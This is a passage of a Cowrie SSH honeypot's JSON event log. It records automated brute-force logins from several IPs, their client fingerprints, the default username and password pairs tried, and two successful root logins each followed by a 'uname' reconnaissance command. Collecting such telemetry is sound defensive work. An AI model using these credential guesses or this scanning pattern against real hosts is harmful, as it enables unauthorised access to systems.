penssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:12:32.503821Z","src_ip":"83.168.105.65","session":"efe4d86a9a1f"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:32.615746Z","src_ip":"83.168.105.65","session":"efe4d86a9a1f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:33.655089Z","src_ip":"83.168.105.65","session":"efe4d86a9a1f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":40004,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e2a7686adb1","protocol":"ssh","message":"New connection: 83.168.105.65:40004 (1.2.3.4:22) [session: 3e2a7686adb1]","sensor":"my-vps","timestamp":"2025-08-26T12:12:47.979480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:47.980372Z","src_ip":"83.168.105.65","session":"3e2a7686adb1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:12:48.017033Z","src_ip":"83.168.105.65","session":"3e2a7686adb1"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:48.128925Z","src_ip":"83.168.105.65","session":"3e2a7686adb1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:49.169003Z","src_ip":"83.168.105.65","session":"3e2a7686adb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54948,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfd936a620e3","protocol":"ssh","message":"New connection: 212.227.235.229:54948 (1.2.3.4:22) [session: cfd936a620e3]","sensor":"my-vps","timestamp":"2025-08-26T12:12:54.789831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:55.021435Z","src_ip":"212.227.235.229","session":"cfd936a620e3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:12:55.022347Z","src_ip":"212.227.235.229","session":"cfd936a620e3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r","message":"login attempt [admin/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:56.746846Z","src_ip":"212.227.235.229","session":"cfd936a620e3"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:58.333902Z","src_ip":"212.227.235.229","session":"cfd936a620e3"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47744,"dst_ip":"1.2.3.4","dst_port":22,"session":"32fedb39e2e0","protocol":"ssh","message":"New connection: 83.168.105.65:47744 (1.2.3.4:22) [session: 32fedb39e2e0]","sensor":"my-vps","timestamp":"2025-08-26T12:13:03.389820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:13:03.391448Z","src_ip":"83.168.105.65","session":"32fedb39e2e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:13:03.427448Z","src_ip":"83.168.105.65","session":"32fedb39e2e0"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:03.537239Z","src_ip":"83.168.105.65","session":"32fedb39e2e0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38058,"dst_ip":"1.2.3.4","dst_port":22,"session":"f89be90dda27","protocol":"ssh","message":"New connection: 196.251.86.249:38058 (1.2.3.4:22) [session: f89be90dda27]","sensor":"my-vps","timestamp":"2025-08-26T12:13:04.448664Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:04.574329Z","src_ip":"83.168.105.65","session":"32fedb39e2e0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:13:05.252227Z","src_ip":"196.251.86.249","session":"f89be90dda27"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:13:05.254619Z","src_ip":"196.251.86.249","session":"f89be90dda27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57184,"dst_ip":"1.2.3.4","dst_port":22,"session":"caa5e6c16fce","protocol":"ssh","message":"New connection: 212.227.235.229:57184 (1.2.3.4:22) [session: caa5e6c16fce]","sensor":"my-vps","timestamp":"2025-08-26T12:13:06.081664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T12:13:06.082442Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T12:13:06.189538Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Russian7","message":"login attempt [admin/Russian7] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:06.701049Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.login.failed","username":"test","password":"654321","message":"login attempt [test/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:07.256176Z","src_ip":"196.251.86.249","session":"f89be90dda27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rsalinas","message":"login attempt [admin/rsalinas] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:07.810248Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:08.777074Z","src_ip":"196.251.86.249","session":"f89be90dda27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"roserose","message":"login attempt [admin/roserose] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:08.919486Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rosco","message":"login attempt [admin/rosco] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:10.028992Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rootedit","message":"login attempt [admin/rootedit] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:11.143729Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:12.253609Z","src_ip":"212.227.235.229","session":"caa5e6c16fce"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53594,"dst_ip":"1.2.3.4","dst_port":22,"session":"be86a121ac1c","protocol":"ssh","message":"New connection: 83.168.105.65:53594 (1.2.3.4:22) [session: be86a121ac1c]","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.045272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.046404Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.085927Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.247620Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:13:19.393330Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.394094Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.435800Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:19.436921Z","src_ip":"83.168.105.65","session":"be86a121ac1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43152,"dst_ip":"1.2.3.4","dst_port":22,"session":"1068dee10cb0","protocol":"ssh","message":"New connection: 212.227.235.229:43152 (1.2.3.4:22) [session: 1068dee10cb0]","sensor":"my-vps","timestamp":"2025-08-26T12:13:29.396915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:13:29.806835Z","src_ip":"212.227.235.229","session":"1068dee10cb0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:13:29.807510Z","src_ip":"212.227.235.229","session":"1068dee10cb0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"000000","message":"login attempt [admin/000000] failed","sensor":"my-vps","timestamp":"2025-08-26T12:13:31.609796Z","src_ip":"212.227.235.229","session":"1068dee10cb0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:32.936471Z","src_ip":"212.227.235.229","session":"1068dee10cb0"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":42654,"dst_ip":"1.2.3.4","dst_port":22,"session":"f15ab460dc52","protocol":"ssh","message":"New connection: 83.168.105.65:42654 (1.2.3.4:22) [session: f15ab460dc52]","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.657856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.659009Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.696098Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.809230Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:13:34.900594Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.901287Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.939794Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:34.940931Z","src_ip":"83.168.105.65","session":"f15ab460dc52"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50136,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8274c9c6d48","protocol":"ssh","message":"New connection: 83.168.105.65:50136 (1.2.3.4:22) [session: d8274c9c6d48]","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.290620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.291643Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"en